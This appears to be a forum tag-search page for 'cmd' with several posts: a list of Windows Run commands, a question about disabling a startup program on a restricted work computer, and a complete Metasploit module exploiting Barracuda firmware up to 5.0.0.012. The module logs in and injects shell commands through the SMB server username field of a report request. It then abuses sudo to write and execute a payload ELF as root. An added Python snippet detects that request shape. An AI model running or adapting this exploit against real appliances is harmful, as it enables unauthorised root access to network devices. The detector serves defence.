Search the Community
Showing results for tags 'cmd'.
-
The most useful Run commands in Windows 7 and 10. These commands let you quickly access features and applications to customize the operating system environment.

Quick Access To C: drive | \
Open the current user’s home folder | .
Open up the Users folder | ..
Open Documents Folder | documents
Open Videos folder | videos
Open Downloads Folder | downloads
Open Favorites Folder | favorites
Open Recent Folder | recent
Open Recent Folder | logoff
Open Pictures Folder | pictures
Windows Sideshow | control.exe /name Microsoft.WindowsSideshow
Windows CardSpace | control.exe /name Microsoft.cardspace
Windows Anytime Upgrade | WindowsAnytimeUpgradeui
Taskbar and Start Menu | control.exe /name Microsoft.TaskbarandStartMenu
Troubleshooting | control.exe /name Microsoft.Troubleshooting
User Accounts | control.exe /name Microsoft.UserAccounts
Adding a new Device | devicepairingwizard
Add Hardware Wizard | hdwwiz
Advanced User Accounts | netplwiz
Advanced User Accounts | azman.msc
Backup and Restore | sdclt
Bluetooth File Transfer | fsquirt
Calculator | calc
Certificates | certmgr.msc
Change Computer Performance Settings | systempropertiesperformance
Change Data Execution Prevention Settings | systempropertiesdataexecutionprevention
Change Data Execution Prevention Settings | printui
Character Map | charmap
ClearType Tuner | cttune
Color Management | colorcpl
Command Prompt | cmd
Component Services | comexp.msc
Component Services | dcomcnfg
Computer Management | compmgmt.msc
Computer Management | compmgmtlauncher
Connect to a Network Projector | netproj
Connect to a Projector | displayswitch
Control Panel | control
Create A Shared Folder Wizard | shrpubw
Create a System Repair Disc | recdisc
Credential Backup and Restore Wizard | credwiz
Data Execution Prevention | systempropertiesdataexecutionprevention
Date and Time | timedate.cpl
Default Location | locationnotifications
Device Manager | devmgmt.msc
Device Manager | hdwwiz.cpl
Device Pairing Wizard | devicepairingwizard
Diagnostics Troubleshooting Wizard | msdt
Digitizer Calibration Tool | tabcal
DirectX Diagnostic Tool | dxdiag
Disk Cleanup | cleanmgr
Disk Defragmenter | dfrgui
Disk Management | diskmgmt.msc
Display | dpiscaling
Display Color Calibration | dccw
Display Switch | displayswitch
DPAPI Key Migration Wizard | dpapimig
Driver Verifier Manager | verifier
Ease of Access Center | utilman
EFS Wizard | rekeywiz
Event Viewer | eventvwr.msc
Fax Cover Page Editor | fxscover
File Signature Verification | sigverif
Font Viewer | fontview
Game Controllers | joy.cpl
Getting Started | gettingstarted
IExpress Wizard | iexpress
Getting Started | irprops.cpl
Install or Uninstall Display Languages | lusrmgr
Internet Explorer | iexplore
Internet Options | inetcpl.cpl
iSCSI Initiator Configuration Tool | iscsicpl
Language Pack Installer | lpksetup
Local Group Policy Editor | gpedit.msc
Local Security Policy | secpol.msc
Local Users and Groups | lusrmgr.msc
Location Activity | locationnotifications
Magnifier | magnify
Malicious Software Removal Tool | mrt
Manage Your File Encryption Certificates | rekeywiz
Math Input Panel | mip
Microsoft Management Console | mmc
Microsoft Support Diagnostic Tool | msdt
Mouse | main.cpl
NAP Client Configuration | napclcfg.msc
Narrator | narrator
Network Connections | ncpa.cpl
New Scan Wizard | wiaacmgr
Notepad | notepad
ODBC Data Source Administrator | odbcad32
ODBC Driver Configuration | odbcconf
On-Screen Keyboard | osk
Paint | mspaint
Pen and Touch | tabletpc.cpl
People Near Me | collab.cpl
Performance Monitor | perfmon.msc
Performance Options | systempropertiesperformance
Phone and Modem | telephon.cpl
Phone Dialer | dialer
Power Options | powercfg.cpl
Presentation Settings | presentationsettings
Print Management | printmanagement.msc
Printer Migration | printbrmui
Printer User Interface | printui
Private Character Editor | eudcedit
Problem Steps Recorder | psr
Programs and Features | appwiz.cpl
Protected Content Migration | dpapimig
Region and Language | intl.cpl
Registry Editor | regedit
Registry Editor 32 | regedt32
Remote Access Phonebook | rasphone
Remote Desktop Connection | mstsc
Resource Monitor | resmon
Resultant Set of Policy | rsop.msc
SAM Lock Tool | syskey
Screen Resolution | desk.cpl
Securing the Windows Account Database | syskey
Services | services.msc
Set Program Access and Computer Defaults | computerdefaults
Share Creation Wizard | shrpubw
Shared Folders | fsmgmt.msc
Snipping Tool | snippingtool
Sound | mmsys.cpl
Sound recorder | soundrecorder
SQL Server Client Network Utility | cliconfg
Sticky Notes | stikynot
Stored User Names and Passwords | credwiz
Sync Center | mobsync
System Configuration | msconfig
System Configuration Editor | sysedit
System Information | msinfo32
System Properties | sysdm.cpl
System Properties (Advanced Tab) | systempropertiesadvanced
System Properties (Computer Name Tab) | systempropertiescomputername
System Properties (Hardware Tab) | systempropertieshardware
System Properties (Remote Tab) | systempropertiesremote
System Properties (System Protection Tab) | systempropertiesprotection
System Restore | rstrui
Task Manager | taskmgr
Task Scheduler | taskschd.msc
Trusted Platform Module (TPM) Management | tpm.msc
User Account Control Settings | useraccountcontrolsettings
Utility Manager | utilman
Version Reporter Applet | winver
Volume Mixer | sndvol
Windows Action Center | wscui.cpl
Windows Activation Client | slui
Windows Anytime Upgrade Results | windowsanytimeupgraderesults
Windows CardSpace | infocardcpl.cpl
Windows Disc Image Burning Tool | isoburn
Windows DVD Maker | dvdmaker
Windows Easy Transfer | migwiz
Windows Explorer | explorer
Windows Fax and Scan | wfs
Windows Features | optionalfeatures
Windows Firewall | firewall.cpl
Windows Firewall with Advanced Security | wf.msc
Windows Journal | journal
Windows Media Player | wmplayer
Windows Memory Diagnostic Scheduler | mdsched
Windows Mobility Center | mblctr
Windows Picture Acquisition Wizard | wiaacmgr
Windows PowerShell | powershell
Windows PowerShell ISE | powershell_ise
Windows Remote Assistance | msra
Windows Repair Disc | recdisc
Windows Script Host | wscript
Windows Update | wuapp
Windows Update Standalone Installer | wusa
Version Windows | winver
WMI Management | wmimgmt.msc
WordPad | write
XPS Viewer | xpsrchvw
Import to Windows Contacts | wabmig
Tablet PC Input Panel | tabtip
Windows Contacts | wab
Windows Firewall with Advanced Security | wf
Windows Help and Support | winhlp32
Windows Script Host | wscript
WMI Tester | wbemtest
Access Screen Resolution page | desk.cpl
Access Mouse properties | main.cpl
Access Windows Action Center | wscui.cpl
Access Network Adapters | ncpa.cpl
Access Power Option | powercfg.cpl
Access the Programs and Features Window | appwiz.cpl
Access the System Properties | sysdm.cpl
Access the Windows Firewall | firewall.cpl
-
The repo is private for now.
-
# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit
# Exploit Author: xort
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/webfilter
# Version: Firmware <= 5.0.0.012
# Tested on: Vx and Hardware platforms
#
# Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under privileged user with report generating
# capabilities. This exploit leverages a command injection bug along with poor sudo permissions to obtain
# root. xort@blacksecurity.org

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',
      'Description' => %q{
        This module exploits a remote command execution vulnerability in
        the Barracuda Firmware Version <= 5.0.0.012 by exploiting a
        vulnerability in the web administration interface.
        By sending a specially crafted request it's possible to inject system
        commands while escalating to root due to relaxed sudo configuration on the local
        machine.
      },
      'Author' =>
        [
          'xort', # metasploit module
        ],
      'Version' => '$Revision: 12345 $',
      'References' =>
        [
          [ 'none', 'none'],
        ],
      'Platform' => [ 'linux'],
      'Privileged' => true,
      'Arch' => [ ARCH_X86 ],
      'SessionTypes' => [ 'shell' ],
      'Privileged' => false,
      'Payload' =>
        {
          # note: meterpreter can't run on host due to kernel 2.4 incompatibilities + this is stable
          'Compat' =>
            {
              'ConnectionType' => 'find',
            }
        },
      'Targets' =>
        [
          ['Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('PASSWORD', [ false, 'Device password', "" ]),
        OptString.new('ET', [ false, 'Device password', "" ]),
        OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
        OptString.new('CMD', [ false, 'Command to execute', "" ]),
        Opt::RPORT(8000),
      ], self.class)
  end

  def do_login(username, password, et)
    vprint_status( "Logging into machine with credentials...\n" )

    # timeout
    timeout = 1550;

    # params
    password_clear = "admin"
    real_user = "";
    login_state = "out"
    enc_key = Rex::Text.rand_text_hex(32)
    et = "1358817515"
    locale = "en_US"
    user = username
    password = Digest::MD5.hexdigest(username+enc_key)
    enctype = "MD5"
    password_entry = ""

    vprint_status( "Starting first routine...\n" )

    data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"

    vprint_status( "#{data}\n" )

    res = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => "/cgi-mod/index.cgi",
        'cookie' => "",
        'data' => data
      }, timeout)

    vprint_status( "login got code: #{res.code} ... continuing to second request..." )
    File.open("/tmp/output2", 'w+') {|f| f.write(res.body) }

    # get rid of first yank
    password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result
    et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]

    vprint_status( "password got back = #{password} - et got back = #{et}\n" )

    return password, et
  end

  def run_command(username, password, et, cmd)
    vprint_status( "Running Command...\n" )

    exploitreq = [
      [ "primary_tab", "BASIC" ],
      [ "secondary_tab","reports" ],
      [ "realm","" ],
      [ "auth_type","Local" ],
      [ "user", username ],
      [ "password", password ],
      [ "et",et ],
      [ "role","" ],
      [ "locale","en_US" ],
      [ "q","" ],
      [ "UPDATE_new_report_time_frame","custom" ],
      [ "report_start","2013-01-25 01:14" ],
      [ "report_end","2013-01-25 02:14" ],
      [ "type","" ],
      [ "ntlm_server","" ],
      [ "kerb_server","" ],
      [ "local_group","changeme" ],
      [ "ip_group","20.20.108.0/0.0.0.0" ],
      [ "ip_address__0","" ],
      [ "ip_address__1","" ],
      [ "ip_address__2","" ],
      [ "ip_address__3","" ],
      [ "netmask__0","" ],
      [ "netmask__1","" ],
      [ "netmask__2","" ],
      [ "netmask__3","" ],
      [ "UPDATE_new_report_pattern_values","" ],
      [ "UPDATE_new_report_pattern_text","" ],
      [ "UPDATE_new_report_filter_destination","domain" ],
      [ "filter_domain","" ],
      [ "UPDATE_new_report_filter_domain","" ],
      [ "UPDATE_new_report_filter_category","" ],
      [ "UPDATE_new_report_exclude_from","" ],
      [ "UPDATE_new_report_exclude_to","" ],
      [ "UPDATE_new_report_exclude_days","" ],
      [ "allow","allow" ],
      [ "block","block" ],
      [ "warn","warn" ],
      [ "monitor","monitor" ],
      [ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ],
      [ "UPDATE_new_report_filter_count","10" ],
      [ "UPDATE_new_report_chart_type","vbar" ],
      [ "UPDATE_new_report_format","html" ],
      [ "DEFAULT_new_report_group_expand","No" ],
      [ "UPDATE_new_report_expand_user_count","5" ],
      [ "UPDATE_new_report_expand_domain_count","5" ],
      [ "UPDATE_new_report_expand_cat_count","5" ],
      [ "UPDATE_new_report_expand_url_count","5" ],
      [ "UPDATE_new_report_expand_threat_count","5" ],
      [ "report","on" ],
      [ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],
      [ "UPDATE_new_report_id","" ],
      [ "UPDATE_new_report_enabled","Yes" ],
      [ "secondary_scope","report" ],
      [ "secondary_scope_data","" ],
      [ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ],
      [ "UPDATE_new_report_delivery","external" ],
      [ "UPDATE_new_report_delivery_dest_email","" ],
      [ "UPDATE_new_report_server","new" ],
      [ "UPDATE_new_external_server_type","smb" ],
      [ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],
      [ "UPDATE_new_external_server","4.4.4.4" ],
      [ "UPDATE_new_external_server_port","445" ],
      [ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ],
      [ "UPDATE_new_external_server_password","asdf" ],
      [ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ],
      [ "UPDATE_new_report_frequency", "once" ],
      [ "UPDATE_new_report_split", "no" ],
      [ "add_report_id","Apply" ],
      [ "remover","" ]
    ]

    data = Rex::MIME::Message.new
    data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)

    exploitreq.each do |xreq|
      data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")
    end

    post_data = data.to_s
    post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")

    datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"

    vprint_status( "sending..." )
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => "/cgi-mod/index.cgi",
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data,
      'headers' =>
        {
          'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          'Accept-Language' => "en-US,en;q=0.5"
        }
    })

    if res.code == 200
      vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" )
      vprint_status( "password: #{password} et: #{et}\n" )
    end

    vprint_status( "login got code: #{res.code} from report_results.cgi\n" )
    File.open("/tmp/output4", 'w+') {|f| f.write(res.body) }
  end

  def run_script(username, password, et, cmds)
    vprint_status( "running script...\n")
  end

  def exploit
    # timeout
    timeout = 1550;

    user = "admin"

    # params
    real_user = "";
    login_state = "out"
    et = "1358817515" #epoch time
    locale = "en_US"
    user = "admin"
    password = ""
    enctype = "MD5"
    password_entry = ""
    password_clear = "admin"

    vprint_status("<- Encoding payload to elf string...")
    elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly

    if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
      password_clear = "admin"
      password = datastore['PASSWORD']
      et = datastore['ET']
    # else - if no 'CMD' string - add code for root shell
    else
      password, et = do_login(user, password, et)
      vprint_status("new password: #{password}\n")
    end

    sleep(5)

    if not datastore['CMD'].nil? and not datastore['CMD'].empty?
      cmd = datastore['CMD']
    end

    run_command(user, password, et, cmd)

    # create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm
    cmd = "echo -ne #{encoded_elf} > /tmp/x ;"
    cmd += "chmod +x /tmp/x ;"

    # backup static_routes file
    cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz"
    cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes"

    # execute elf as root
    cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"

    # restore static_routes file
    cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"

    run_command(user, password, et, cmd)
    sleep(2)
    handler
    sleep(5)
  end
end

Source: http://packetstorm.wowhacker.com/1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt
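
A defender-side check for the request shape the module above sends, as an added example that is not part of the original post: it parses a multipart/form-data POST body (for instance one captured by a reverse proxy in front of /cgi-mod/index.cgi) and flags shell command substitution in the UPDATE_new_external_server_* fields. The sample bodies, the boundary, the function names and the set of flagged characters are assumptions made for this example.

```python
import re

# Field prefix comes from the module's report request; the pattern set is an assumption.
WATCHED_PREFIX = "UPDATE_new_external_server"
CMD_SUBSTITUTION = re.compile(r"`|\$\(")

def form_fields(content_type, body):
    """Tolerantly parse a multipart/form-data body into {field name: value}."""
    m = re.search(r'boundary="?([^";]+)', content_type)
    if not m:
        return {}
    fields = {}
    # Split on the boundary itself so a missing CRLF before it does not hide a field.
    for chunk in body.split(b"--" + m.group(1).encode()):
        head, sep, value = chunk.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if sep and name:
            key = name.group(1).decode("utf-8", "replace")
            fields[key] = value.rstrip(b"\r\n").decode("utf-8", "replace")
    return fields

def suspicious_fields(content_type, body):
    """Names of watched fields whose value contains shell command substitution."""
    return sorted(n for n, v in form_fields(content_type, body).items()
                  if n.startswith(WATCHED_PREFIX) and CMD_SUBSTITUTION.search(v))

def build_body(boundary, fields):
    """Build a constructed multipart body for the samples below."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    return ("".join(parts) + f"--{boundary}--\r\n").encode()

# Constructed samples: boundary and values are made up for this example.
BOUNDARY = "---------------------------0123456789"
CTYPE = f"multipart/form-data; boundary={BOUNDARY}"
BENIGN = build_body(BOUNDARY, {
    "secondary_tab": "reports",
    "UPDATE_new_external_server_port": "445",
    "UPDATE_new_external_server_username": "reportsvc",
})
FLAGGED = build_body(BOUNDARY, {
    "secondary_tab": "reports",
    "UPDATE_new_external_server_port": "445",
    "UPDATE_new_external_server_username": '"` CMD `"',  # placeholder, same quoting as the post
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("flagged", FLAGGED)):
        print(label, suspicious_fields(CTYPE, body))
```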
-
Hello. The idea is as follows: I want to stop a program from starting together with Windows (W7). The computer is the one at work and has pretty much all functions disabled; the only one that works is cmd. I tried to delete the registry entry in question from cmd, but it won't let me... Do you have any idea?